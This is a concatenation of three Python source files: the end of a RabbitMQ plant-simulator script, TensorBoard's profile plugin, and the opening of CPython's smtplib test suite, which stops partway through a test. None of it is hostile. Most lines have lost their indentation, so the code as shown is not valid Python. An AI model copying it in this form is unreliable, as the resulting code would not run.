# threading.Thread(target=sim_command,args=[msg]).start() # Pika does not seem to like sending messages from different threads
# else:
# print msg
def main(args):
global plant_g, fail_all_activities
if args.fail:
        print('Args fail', args.fail)
fail_all_activities = True
plantid = args.plantid
if plantid == '':
plantid = '#'
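        # '#' is presumably the RabbitMQ topic wildcard, so an empty --plantid
        # subscribes to updates for every plant.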
local_plant = plant.Plant(plantid, args.exchange, args.host, args.port)
plant_g = local_plant
local_plant.wait_for_messages(dispatch_func)
local_plant.close()
plant_g = None
if __name__ == "__main__":
print("plant-main.py as script")
parser = argparse.ArgumentParser(description='Plant Sim (Python)')
parser.add_argument('--host', default='localhost', help='RMQ host')
parser.add_argument('-p', '--port', default=5672, help='RMQ Port', type=int)
parser.add_argument('-e', '--exchange', default='tpn-updates', help='RMQ Exchange')
parser.add_argument('--plantid', default="plant", help='default plant-id')
parser.add_argument('--fail', dest='fail', action='store_true', help='Will fail all activities')
args = parser.parse_args()
sys.exit(main(args))
|
profile_plugin.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard plugin for performance profiling."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import re
import threading
import six
import tensorflow.compat.v2 as tf
from werkzeug import wrappers
from tensorboard.backend.event_processing import plugin_asset_util
from tensorboard.plugins import base_plugin
from tensorflow.python.profiler import profiler_client # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.profiler import profiler_v2 as profiler # pylint: disable=g-direct-tensorflow-import
from tensorboard_plugin_profile.convert import raw_to_tool_data as convert
tf.enable_v2_behavior()
logger = logging.getLogger('tensorboard')
# The prefix of routes provided by this plugin.
PLUGIN_NAME = 'profile'
INDEX_JS_ROUTE = '/index.js'
INDEX_HTML_ROUTE = '/index.html'
BUNDLE_JS_ROUTE = '/bundle.js'
STYLES_CSS_ROUTE = '/styles.css'
MATERIALICONS_WOFF2_ROUTE = '/materialicons.woff2'
TRACE_VIEWER_INDEX_HTML_ROUTE = '/trace_viewer_index.html'
TRACE_VIEWER_INDEX_JS_ROUTE = '/trace_viewer_index.js'
ZONE_JS_ROUTE = '/zone.js'
DATA_ROUTE = '/data'
TOOLS_ROUTE = '/tools'
HOSTS_ROUTE = '/hosts'
CAPTURE_ROUTE = '/capture_profile'
# Suffixes of "^, #, @" symbols represent different input data formats for the
# same tool.
# 1) '^': data generated from XPlane.
# 2) '#': data is in gzip format.
# 3) '@': data generated from proto, or a tracetable for the streaming trace viewer.
# 4) no suffix: data is in JSON format, ready to feed to the frontend.
TOOLS = {
'trace_viewer': 'trace',
'trace_viewer#': 'trace.json.gz',
'trace_viewer@': 'tracetable', # streaming trace viewer
'op_profile': 'op_profile.json',
'input_pipeline_analyzer': 'input_pipeline.json',
'input_pipeline_analyzer@': 'input_pipeline.pb',
'overview_page': 'overview_page.json',
'overview_page@': 'overview_page.pb',
'memory_viewer': 'memory_viewer.json',
'pod_viewer': 'pod_viewer.json',
'tensorflow_stats': 'tensorflow_stats.pb',
'kernel_stats': 'kernel_stats.pb',
'memory_profile#': 'memory_profile.json.gz',
'xplane': 'xplane.pb',
'tf_data_bottleneck_analysis': 'tf_data_bottleneck_analysis.json',
}
ALL_HOSTS = 'ALL_HOSTS'
_EXTENSION_TO_TOOL = {extension: tool for tool, extension in TOOLS.items()}
_FILENAME_RE = re.compile(r'(?:(.*)\.)?(' +
'|'.join(TOOLS.values()).replace('.', r'\.') + r')')
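# Example: _FILENAME_RE.fullmatch('host1.trace').groups() == ('host1', 'trace'),
# which _parse_filename() maps back to ('host1', 'trace_viewer').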
# Tools that consume raw data.
_RAW_DATA_TOOLS = frozenset(
tool for tool, extension in TOOLS.items()
if extension.endswith('.json') or extension.endswith('.json.gz'))
# Tools that can be generated from xplane end with ^.
XPLANE_TOOLS = [
'trace_viewer^',
'overview_page^',
'input_pipeline_analyzer^',
'tensorflow_stats^',
'kernel_stats^',
'memory_profile^',
'pod_viewer^',
'tf_data_bottleneck_analysis^',
]
# XPlane generated tools that support all host mode.
XPLANE_TOOLS_ALL_HOSTS_SUPPORTED = frozenset([
'input_pipeline_analyzer^',
'tensorflow_stats^',
'kernel_stats^',
'overview_page^',
'pod_viewer^',
'tf_data_bottleneck_analysis^',
])
# XPlane generated tools that only support all host mode.
XPLANE_TOOLS_ALL_HOSTS_ONLY = frozenset(
['overview_page^', 'pod_viewer^', 'tf_data_bottleneck_analysis^'])
def _use_xplane(tool):
return tool[-1] == '^'
def _make_filename(host, tool):
"""Returns the name of the file containing data for the given host and tool.
Args:
host: Name of the host that produced the profile data, e.g., 'localhost'.
tool: Name of the tool, e.g., 'trace_viewer'.
Returns:
The host name concatenated with the tool-specific extension, e.g.,
'localhost.trace'.
"""
filename = str(host) + '.' if host else ''
tool = 'xplane' if _use_xplane(tool) else tool
return filename + TOOLS[tool]
def _parse_filename(filename):
"""Returns the host and tool encoded in a filename in the run directory.
Args:
filename: Name of a file in the run directory. The name might encode a host
and tool, e.g., 'host.tracetable', 'host.domain.op_profile.json', or just
a tool, e.g., 'trace', 'tensorflow_stats.pb'.
Returns:
A tuple (host, tool) containing the names of the host and tool, e.g.,
('localhost', 'trace_viewer'). Either of the tuple's components can be None.
"""
m = _FILENAME_RE.fullmatch(filename)
if m is None:
return filename, None
return m.group(1), _EXTENSION_TO_TOOL[m.group(2)]
def _get_hosts(filenames):
"""Parses a list of filenames and returns the set of hosts.
Args:
filenames: A list of filenames (just basenames, no directory).
Returns:
A set of host names encoded in the filenames.
"""
hosts = set()
for name in filenames:
host, _ = _parse_filename(name)
if host:
hosts.add(host)
return hosts
def _get_tools(filenames):
"""Parses a list of filenames and returns the set of tools.
If xplane is present in the repository, add tools that can be generated by
xplane if we don't have a file for the tool.
Args:
filenames: A list of filenames (just basenames, no directory).
Returns:
A set of tool names encoded in the filenames.
"""
tools = set()
found = set()
has_xplane = False
for name in filenames:
_, tool = _parse_filename(name)
if tool == 'xplane':
has_xplane = True
continue
elif tool:
tools.add(tool)
if tool[-1] in ('@', '#'):
found.add(tool[:-1])
else:
found.add(tool)
if has_xplane:
for item in XPLANE_TOOLS:
if item[:-1] not in found:
tools.add(item)
return tools
def get_worker_list(cluster_resolver):
"""Parses TPU workers list from the cluster resolver."""
cluster_spec = cluster_resolver.cluster_spec()
task_indices = cluster_spec.task_indices('worker')
worker_list = [
cluster_spec.task_address('worker', i).replace(':8470', ':8466')
for i in task_indices
]
return ','.join(worker_list)
def respond(body, content_type, code=200, content_encoding=None):
"""Create a Werkzeug response, handling JSON serialization and CSP.
Args:
body: For JSON responses, a JSON-serializable object; otherwise, a raw
`bytes` string or Unicode `str` (which will be encoded as UTF-8).
content_type: Response content-type (`str`); use `application/json` to
automatically serialize structures.
code: HTTP status code (`int`).
content_encoding: Response Content-Encoding header ('str'); e.g. 'gzip'.
Returns:
A `werkzeug.wrappers.BaseResponse` object.
"""
if content_type == 'application/json' and isinstance(
body, (dict, list, set, tuple)):
body = json.dumps(body, sort_keys=True)
if not isinstance(body, bytes):
body = body.encode('utf-8')
csp_parts = {
'default-src': ["'self'"],
'script-src': [
"'self'",
"'unsafe-eval'",
"'unsafe-inline'",
'https://www.gstatic.com',
],
'object-src': ["'none'"],
'style-src': [
"'self'",
"'unsafe-inline'",
'https://www.gstatic.com',
],
'img-src': [
"'self'",
'blob:',
'data:',
],
}
csp = ';'.join((' '.join([k] + v) for (k, v) in csp_parts.items()))
headers = [
('Content-Security-Policy', csp),
('X-Content-Type-Options', 'nosniff'),
]
if content_encoding:
headers.append(('Content-Encoding', content_encoding))
return wrappers.Response(
body, content_type=content_type, status=code, headers=headers)
class ProfilePlugin(base_plugin.TBPlugin):
"""Profile Plugin for TensorBoard."""
plugin_name = PLUGIN_NAME
def __init__(self, context):
"""Constructs a profiler plugin for TensorBoard.
This plugin adds handlers for performance-related frontends.
Args:
context: A base_plugin.TBContext instance.
"""
self.logdir = context.logdir
self.multiplexer = context.multiplexer
self.stub = None
self.master_tpu_unsecure_channel = context.flags.master_tpu_unsecure_channel
# Whether the plugin is active. This is an expensive computation, so we
# compute this asynchronously and cache positive results indefinitely.
self._is_active = False
# Lock to ensure at most one thread computes _is_active at a time.
self._is_active_lock = threading.Lock()
def is_active(self):
"""Whether this plugin is active and has any profile data to show.
Detecting profile data is expensive, so this process runs asynchronously
and the value reported by this method is the cached value and may be stale.
Returns:
Whether any run has profile data.
"""
# If we are already active, we remain active and don't recompute this.
# Otherwise, try to acquire the lock without blocking; if we get it and
# we're still not active, launch a thread to check if we're active and
# release the lock once the computation is finished. Either way, this
# thread returns the current cached value to avoid blocking.
if not self._is_active and self._is_active_lock.acquire(False):
if self._is_active:
self._is_active_lock.release()
else:
def compute_is_active():
self._is_active = any(self.generate_run_to_tools())
self._is_active_lock.release()
new_thread = threading.Thread(
target=compute_is_active, name='DynamicProfilePluginIsActiveThread')
new_thread.start()
return self._is_active
def get_plugin_apps(self):
return {
INDEX_JS_ROUTE: self.static_file_route,
INDEX_HTML_ROUTE: self.static_file_route,
BUNDLE_JS_ROUTE: self.static_file_route,
STYLES_CSS_ROUTE: self.static_file_route,
MATERIALICONS_WOFF2_ROUTE: self.static_file_route,
TRACE_VIEWER_INDEX_HTML_ROUTE: self.static_file_route,
TRACE_VIEWER_INDEX_JS_ROUTE: self.static_file_route,
ZONE_JS_ROUTE: self.static_file_route,
TOOLS_ROUTE: self.tools_route,
HOSTS_ROUTE: self.hosts_route,
DATA_ROUTE: self.data_route,
CAPTURE_ROUTE: self.capture_route,
}
def frontend_metadata(self):
return base_plugin.FrontendMetadata(es_module_path='/index.js')
@wrappers.Request.application
def static_file_route(self, request):
filename = os.path.basename(request.path)
    extension = os.path.splitext(filename)[1]
    if extension == '.html':
      mimetype = 'text/html'
    elif extension == '.css':
      mimetype = 'text/css'
    elif extension == '.js':
mimetype = 'application/javascript'
else:
mimetype = 'application/octet-stream'
filepath = os.path.join(os.path.dirname(__file__), 'static', filename)
try:
with open(filepath, 'rb') as infile:
contents = infile.read()
except IOError:
return respond('404 Not Found', 'text/plain', code=404)
return respond(contents, mimetype)
@wrappers.Request.application
def tools_route(self, request):
run_to_tools = dict(self.generate_run_to_tools())
return respond(run_to_tools, 'application/json')
def host_impl(self, run, tool):
"""Returns available hosts for the run and tool in the log directory.
In the plugin log directory, each directory contains profile data for a
single run (identified by the directory name), and files in the run
directory contains data for different tools and hosts. The file that
contains profile for a specific tool "x" will have extension TOOLS["x"].
Example:
log/
run1/
plugins/
profile/
host1.trace
host2.trace
run2/
plugins/
profile/
host1.trace
host2.trace
Args:
run: the frontend run name, e.g., 'run1' or 'run2' for the example above.
tool: the requested tool, e.g., 'trace_viewer' for the example above.
Returns:
A list of host names, e.g. ["host1", "host2"] for the example above.
"""
run_dir = self._run_dir(run)
if not run_dir:
logger.warning('Cannot find asset directory for: %s', run)
return []
tool_pattern = _make_filename('*', tool)
try:
filenames = tf.io.gfile.glob(os.path.join(run_dir, tool_pattern))
except tf.errors.OpError as e:
      logger.warning('Cannot read asset directory: %s, OpError %s', run_dir, e)
      return []
filenames = [os.path.basename(f) for f in filenames]
hosts = _get_hosts(filenames)
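    # For multi-host runs, some XPlane-based tools are only meaningful when
    # aggregated across hosts, while others additionally offer an ALL_HOSTS view.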
if len(hosts) > 1:
if tool in XPLANE_TOOLS_ALL_HOSTS_ONLY:
hosts = [ALL_HOSTS]
elif tool in XPLANE_TOOLS_ALL_HOSTS_SUPPORTED:
hosts.add(ALL_HOSTS)
return sorted(hosts)
@wrappers.Request.application
def hosts_route(self, request):
run = request.args.get('run')
tool = request.args.get('tag')
hosts = self.host_impl(run, tool)
return respond(hosts, 'application/json')
def data_impl(self, request):
"""Retrieves and processes the tool data for a run and a host.
Args:
request: XMLHttpRequest
Returns:
A string that can be served to the frontend tool or None if tool,
run or host is invalid.
"""
run = request.args.get('run')
tool = request.args.get('tag')
host = request.args.get('host')
tqx = request.args.get('tqx')
run_dir = self._run_dir(run)
# Profile plugin "run" is the last component of run dir.
profile_run = os.path.basename(run_dir)
if tool not in TOOLS and not _use_xplane(tool):
return None, None
self.start_grpc_stub_if_necessary()
if tool == 'trace_viewer@' and self.stub is not None:
# Streaming trace viewer needs profiler_analysis service, which is only
# supported in Cloud TPU. This code is unused when data was produced by
# open-source TensorFlow. Only import the library when needed.
# pylint: disable=g-import-not-at-top
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.profiler import profiler_analysis_pb2
# pylint: enable=g-import-not-at-top
# pylint: enable=g-direct-tensorflow-import
grpc_request = profiler_analysis_pb2.ProfileSessionDataRequest()
grpc_request.repository_root = os.path.dirname(run_dir)
grpc_request.session_id = profile_run
grpc_request.tool_name = 'trace_viewer'
# Remove the trailing dot if present
grpc_request.host_name = host.rstrip('.')
grpc_request.parameters['resolution'] = request.args.get(
'resolution', 8000)
if request.args.get('start_time_ms') is not None:
grpc_request.parameters['start_time_ms'] = request.args.get(
'start_time_ms')
if request.args.get('end_time_ms') is not None:
grpc_request.parameters['end_time_ms'] = request.args.get('end_time_ms')
grpc_response = self.stub.GetSessionToolData(grpc_request)
return grpc_response.output, None
asset_path = os.path.join(run_dir, _make_filename(host, tool))
data, content_encoding = None, None
if _use_xplane(tool):
if host == ALL_HOSTS:
file_pattern = _make_filename('*', 'xplane')
try:
asset_paths = tf.io.gfile.glob(os.path.join(run_dir, file_pattern))
except tf.errors.OpError as e:
          logger.warning('Cannot read asset directory: %s, OpError %s', run_dir,
                         e)
          return None, None
else:
asset_paths = [asset_path]
try:
data = convert.xspace_to_tool_data(asset_paths, tool, tqx)
except AttributeError:
logger.warning('XPlane converters are available after Tensorflow 2.4')
return data, content_encoding
raw_data = None
try:
with tf.io.gfile.GFile(asset_path, 'rb') as f:
raw_data = f.read()
except tf.errors.NotFoundError:
logger.warning('Asset path %s not found', asset_path)
except tf.errors.OpError as e:
logger.warning("Couldn't read asset path: %s, OpError %s", asset_path, e)
if raw_data is None:
return None, None
if tool in _RAW_DATA_TOOLS:
data = raw_data
if tool[-1] == '#':
content_encoding = 'gzip'
else:
data = convert.tool_proto_to_tool_data(raw_data, tool, tqx)
return data, content_encoding
@wrappers.Request.application
def data_route(self, request):
# params
# request: XMLHTTPRequest.
data, content_encoding = self.data_impl(request)
if data is None:
return respond('404 Not Found', 'text/plain', code=404)
return respond(data, 'application/json', content_encoding=content_encoding)
@wrappers.Request.application
def capture_route(self, request):
service_addr = request.args.get('service_addr')
duration = int(request.args.get('duration', '1000'))
is_tpu_name = request.args.get('is_tpu_name') == 'true'
worker_list = request.args.get('worker_list')
num_tracing_attempts = int(request.args.get('num_retry', '0')) + 1
options = None
try:
options = profiler.ProfilerOptions(
host_tracer_level=int(request.args.get('host_tracer_level', '2')),
device_tracer_level=int(request.args.get('device_tracer_level', '1')),
python_tracer_level=int(request.args.get('python_tracer_level', '0')),
delay_ms=int(request.args.get('delay', '0'))
)
except AttributeError:
logger.warning('ProfilerOptions are available after tensorflow 2.3')
if is_tpu_name:
try:
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
service_addr)
master_grpc_addr = tpu_cluster_resolver.get_master()
except (ImportError, RuntimeError) as err:
        return respond({'error': str(err)}, 'application/json', code=200)
except (ValueError, TypeError):
return respond(
{'error': 'no TPUs with the specified names exist.'},
'application/json',
code=200,
)
if not worker_list:
worker_list = get_worker_list(tpu_cluster_resolver)
# TPU cluster resolver always returns port 8470. Replace it with 8466
# on which profiler service is running.
master_ip = master_grpc_addr.replace('grpc://', '').replace(':8470', '')
service_addr = master_ip + ':8466'
# Set the master TPU for streaming trace viewer.
self.master_tpu_unsecure_channel = master_ip
try:
if options:
profiler_client.trace(
service_addr,
self.logdir,
duration,
worker_list,
num_tracing_attempts,
options=options)
else:
profiler_client.trace(
service_addr,
self.logdir,
duration,
worker_list,
num_tracing_attempts,
)
return respond(
{'result': 'Capture profile successfully. Please refresh.'},
'application/json',
)
except tf.errors.UnavailableError:
return respond(
{'error': 'empty trace result.'},
'application/json',
code=200,
)
except Exception as e: # pylint: disable=broad-except
return respond(
{'error': str(e)},
'application/json',
code=200,
)
def start_grpc_stub_if_necessary(self):
# We will enable streaming trace viewer on two conditions:
# 1. user specify the flags master_tpu_unsecure_channel to the ip address of
# as "master" TPU. grpc will be used to fetch streaming trace data.
# 2. the logdir is on google cloud storage.
if self.master_tpu_unsecure_channel and self.logdir.startswith('gs://'):
if self.stub is None:
# gRPC and profiler_analysis are only needed to support streaming trace
# viewer in Cloud TPU. This code is unused when data was produced by
# open-source TensorFlow. Only import the libraries when needed.
# pylint: disable=g-import-not-at-top
import grpc
from tensorflow.python.tpu.profiler import profiler_analysis_pb2_grpc
# pylint: enable=g-import-not-at-top
# Workaround the grpc's 4MB message limitation.
gigabyte = 1024 * 1024 * 1024
options = [('grpc.max_message_length', gigabyte),
('grpc.max_send_message_length', gigabyte),
('grpc.max_receive_message_length', gigabyte)]
tpu_profiler_port = self.master_tpu_unsecure_channel + ':8466'
channel = grpc.insecure_channel(tpu_profiler_port, options)
self.stub = profiler_analysis_pb2_grpc.ProfileAnalysisStub(channel)
def _run_dir(self, run):
"""Helper that maps a frontend run name to a profile "run" directory.
The frontend run name consists of the TensorBoard run name (aka the relative
path from the logdir root to the directory containing the data) path-joined
to the Profile plugin's "run" concept (which is a subdirectory of the
plugins/profile directory representing an individual run of the tool), with
the special case that TensorBoard run is the logdir root (which is the run
named '.') then only the Profile plugin "run" name is used, for backwards
compatibility.
Args:
run: the frontend run name, as described above, e.g. train/run1.
Returns:
The resolved directory path, e.g. /logdir/train/plugins/profile/run1.
Raises:
RuntimeError: If the run directory is not found.
"""
run = run.rstrip(os.sep)
tb_run_name, profile_run_name = os.path.split(run)
if not tb_run_name:
tb_run_name = '.'
tb_run_directory = self.multiplexer.RunPaths().get(tb_run_name)
if tb_run_directory is None:
# Check if logdir is a directory to handle case where it's actually a
# multipart directory spec, which this plugin does not support.
if tb_run_name == '.' and tf.io.gfile.isdir(self.logdir):
tb_run_directory = self.logdir
else:
raise RuntimeError('No matching run directory for run %s' % run)
plugin_directory = plugin_asset_util.PluginDirectory(
tb_run_directory, PLUGIN_NAME)
return os.path.join(plugin_directory, profile_run_name)
def generate_run_to_tools(self):
"""Generator for pairs of "run name" and a list of tools for that run.
The "run name" here is a "frontend run name" - see _run_dir() for the
definition of a "frontend run name" and how it maps to a directory of
profile data for a specific profile "run". The profile plugin concept of
"run" is different from the normal TensorBoard run; each run in this case
represents a single instance of profile data collection, more similar to a
"step" of data in typical TensorBoard semantics. These runs reside in
subdirectories of the plugins/profile directory within any regular
TensorBoard run directory (defined as a subdirectory of the logdir that
contains at least one tfevents file) or within the logdir root directory
itself (even if it contains no tfevents file and would thus not be
considered a normal TensorBoard run, for backwards compatibility).
Within those "profile run directories", there are files in the directory
that correspond to different profiling tools. The file that contains profile
for a specific tool "x" will have a suffix name TOOLS["x"].
Example:
logs/
plugins/
profile/
run1/
hostA.trace
train/
events.out.tfevents.foo
plugins/
profile/
run1/
hostA.trace
hostB.trace
run2/
hostA.trace
validation/
events.out.tfevents.foo
plugins/
profile/
run1/
hostA.trace
Yields:
A sequence of tuples mapping "frontend run names" to lists of tool names
available for those runs. For the above example, this would be:
("run1", ["trace_viewer"])
("train/run1", ["trace_viewer"])
("train/run2", ["trace_viewer"])
("validation/run1", ["trace_viewer"])
"""
self.start_grpc_stub_if_necessary()
plugin_assets = self.multiplexer.PluginAssets(PLUGIN_NAME)
tb_run_names_to_dirs = self.multiplexer.RunPaths()
# Ensure that we also check the root logdir, even if it isn't a recognized
# TensorBoard run (i.e. has no tfevents file directly under it), to remain
    # backwards compatible with the previous profile plugin behavior. Note that we
# check if logdir is a directory to handle case where it's actually a
# multipart directory spec, which this plugin does not support.
if '.' not in plugin_assets and tf.io.gfile.isdir(self.logdir):
tb_run_names_to_dirs['.'] = self.logdir
plugin_assets['.'] = plugin_asset_util.ListAssets(self.logdir,
PLUGIN_NAME)
for tb_run_name, profile_runs in six.iteritems(plugin_assets):
tb_run_dir = tb_run_names_to_dirs[tb_run_name]
tb_plugin_dir = plugin_asset_util.PluginDirectory(tb_run_dir, PLUGIN_NAME)
for profile_run in profile_runs:
# Remove trailing separator; some filesystem implementations emit this.
profile_run = profile_run.rstrip(os.sep)
if tb_run_name == '.':
frontend_run = profile_run
else:
frontend_run = os.path.join(tb_run_name, profile_run)
profile_run_dir = os.path.join(tb_plugin_dir, profile_run)
if tf.io.gfile.isdir(profile_run_dir):
yield frontend_run, self._get_active_tools(profile_run_dir)
def _get_active_tools(self, profile_run_dir):
try:
filenames = tf.io.gfile.listdir(profile_run_dir)
except tf.errors.NotFoundError as e:
logger.warning('Cannot read asset directory: %s, NotFoundError %s',
profile_run_dir, e)
return []
tools = _get_tools(filenames)
if 'trace_viewer@' in tools:
      # The streaming trace viewer always overrides the normal trace viewer.
      # The trailing '@' tells tf-profile-dashboard.html and
      # tf-trace-viewer.html that the streaming trace viewer should be used.
if self.stub is None:
tools.discard('trace_viewer@')
else:
tools.discard('trace_viewer#')
tools.discard('trace_viewer')
if 'trace_viewer#' in tools:
# use compressed trace
tools.discard('trace_viewer')
# Return sorted list of tools with 'overview_page' at the front.
op = frozenset(['overview_page@', 'overview_page', 'overview_page^'])
return list(tools.intersection(op)) + sorted(tools.difference(op))
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
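        # Cap the number of send attempts so a stuck client cannot hang this
        # helper thread forever.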
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
def testUnixDomainSocketTimeoutDefault(self):
local_host = '/some/local/lmtp/delivery/program'
mock_socket.reply_with(b"220 Hello world")
try:
client = self.client(local_host, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
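# The helper below runs the asyncore polling loop in a background thread. It
# sets serv_evt as soon as the loop starts (setUp() waits on this before the
# test proceeds) and again after cleanup; the client side sets client_evt when
# its SMTP conversation is finished, which lets the loop close the server and
# tear down whatever is left in asyncore.socket_map.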
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testEHLO(self):
# check the EHLO reply and the extensions advertised by DebuggingServer
